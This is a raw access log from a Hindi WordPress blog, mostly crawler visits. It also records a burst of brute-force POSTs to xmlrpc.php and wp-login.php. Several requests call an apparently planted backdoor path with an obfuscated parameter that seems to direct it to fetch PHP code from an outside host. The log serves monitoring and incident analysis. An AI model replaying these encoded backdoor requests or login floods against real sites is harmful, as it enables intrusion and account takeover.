193.142.147.5 - - [20/Oct/2025:10:15:01 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:03 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
85.208.96.199 - - [20/Oct/2025:10:15:03 -0400] "GET /tag/raj-kapoor-death/ HTTP/2.0" 200 149936 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:15:04 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:06 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:08 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:09 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
51.38.53.154 - - [20/Oct/2025:10:15:09 -0400] "POST /wp-login.php HTTP/2.0" 200 7149 "https://hindi.blushin.com/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; ms-office)"
193.142.147.5 - - [20/Oct/2025:10:15:10 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:10 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:14 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:15 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:17 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:12:51 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333137312p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393537312q3238373636376432373166383038336337346432646236336164346539393334222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
193.142.147.5 - - [20/Oct/2025:10:15:18 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:19 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
185.191.171.11 - - [20/Oct/2025:10:15:19 -0400] "GET /tag/bridal-beauty-routine/ HTTP/2.0" 200 149607 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:15:21 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
178.33.109.193 - - [20/Oct/2025:10:15:22 -0400] "POST /xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MALCJS; rv:11.0) like Gecko"
193.142.147.5 - - [20/Oct/2025:10:15:23 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:25 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:26 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:28 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:29 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:30 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:31 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
2a03:2880:f800:3c:: - - [20/Oct/2025:10:15:30 -0400] "GET /tag/best-hair-mask-for-hair-fall-in-india/ HTTP/2.0" 200 149738 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
193.142.147.5 - - [20/Oct/2025:10:15:32 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
2a03:2880:f800:2d:: - - [20/Oct/2025:10:15:31 -0400] "GET /4-useful-lipstick-tips-for-first-timers/ HTTP/2.0" 200 312668 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.116.199.115 - - [20/Oct/2025:10:15:34 -0400] "POST /wp-cron.php?doing_wp_cron=1760969734.4176280498504638671875 HTTP/2.0" 200 - "-" "WordPress/6.8.3; https://hindi.blushin.com"
193.142.147.5 - - [20/Oct/2025:10:15:34 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:38 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:13:13 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333139332p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393539332q6264386363653536613461313035626166356566643462323434343138366266222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
193.142.147.5 - - [20/Oct/2025:10:15:39 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:42 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:43 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:45 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:46 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
185.191.171.1 - - [20/Oct/2025:10:15:46 -0400] "GET /tag/my-husband-changed-after-baby/ HTTP/2.0" 200 149723 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:15:48 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:49 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:51 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
114.119.131.42 - - [20/Oct/2025:10:15:53 -0400] "GET /what-boys-never-want-to-express/%E0%A4%A8%E0%A4%B9%E0%A5%80%E0%A4%82-%E0%A4%95%E0%A4%B0%E0%A4%A4%E0%A5%87-%E0%A4%85%E0%A4%AA%E0%A4%A8%E0%A5%87-%E0%A4%B5%E0%A4%A8-%E0%A4%A8%E0%A4%BE%E0%A4%87%E0%A4%9F/ HTTP/2.0" 200 151994 "https://hindi.blushin.com/attachment-sitemap12.xml" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
193.142.147.5 - - [20/Oct/2025:10:15:55 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
144.202.40.252 - - [20/Oct/2025:10:15:57 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:15:57 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:15:58 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
144.202.40.252 - - [20/Oct/2025:10:15:59 -0400] "POST /wp-login.php HTTP/2.0" 200 7088 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:15:59 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:13:35 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333231352p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393631352q6365653939653434666465303061343065656336376261646332376466636165222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
193.142.147.5 - - [20/Oct/2025:10:16:01 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
198.54.126.164 - - [20/Oct/2025:10:16:03 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:03 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:16:04 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
198.54.126.164 - - [20/Oct/2025:10:16:04 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:06 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:16:08 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:16:11 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
178.33.250.142 - - [20/Oct/2025:10:16:13 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:14 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:16:15 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
198.20.104.194 - - [20/Oct/2025:10:16:15 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.153.42.48 - - [20/Oct/2025:10:16:16 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:16 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
103.153.42.48 - - [20/Oct/2025:10:16:17 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:17 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
198.20.104.194 - - [20/Oct/2025:10:16:17 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.33.250.142 - - [20/Oct/2025:10:16:19 -0400] "POST /wp-login.php HTTP/2.0" 200 7149 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:19 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:16:19 -0400] "GET /robots.txt HTTP/2.0" 200 82 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:16:20 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:16:21 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:16:20 -0400] "GET /1405994962?entity=1404051018 HTTP/2.0" 404 164295 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:16:23 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:13:57 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333233372p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393633372q3831653630336139373139643432333932303532326439616533643865353966222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
193.142.147.5 - - [20/Oct/2025:10:16:24 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
72.137.132.54 - - [20/Oct/2025:10:16:25 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:25 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
72.137.132.54 - - [20/Oct/2025:10:16:26 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:27 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
35.200.179.113 - - [20/Oct/2025:10:16:28 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
57.130.20.252 - - [20/Oct/2025:10:16:28 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
57.130.20.252 - - [20/Oct/2025:10:16:29 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:30 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:16:31 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:16:32 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
35.200.179.113 - - [20/Oct/2025:10:16:33 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
50.21.186.206 - - [20/Oct/2025:10:16:33 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:34 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
50.21.186.206 - - [20/Oct/2025:10:16:35 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:36 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:16:37 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:16:39 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
185.191.171.8 - - [20/Oct/2025:10:16:38 -0400] "GET /tag/how-to-use-castor-oil-for-acne/ HTTP/2.0" 200 149891 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
103.171.92.209 - - [20/Oct/2025:10:16:40 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
89.117.74.114 - - [20/Oct/2025:10:16:40 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:41 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
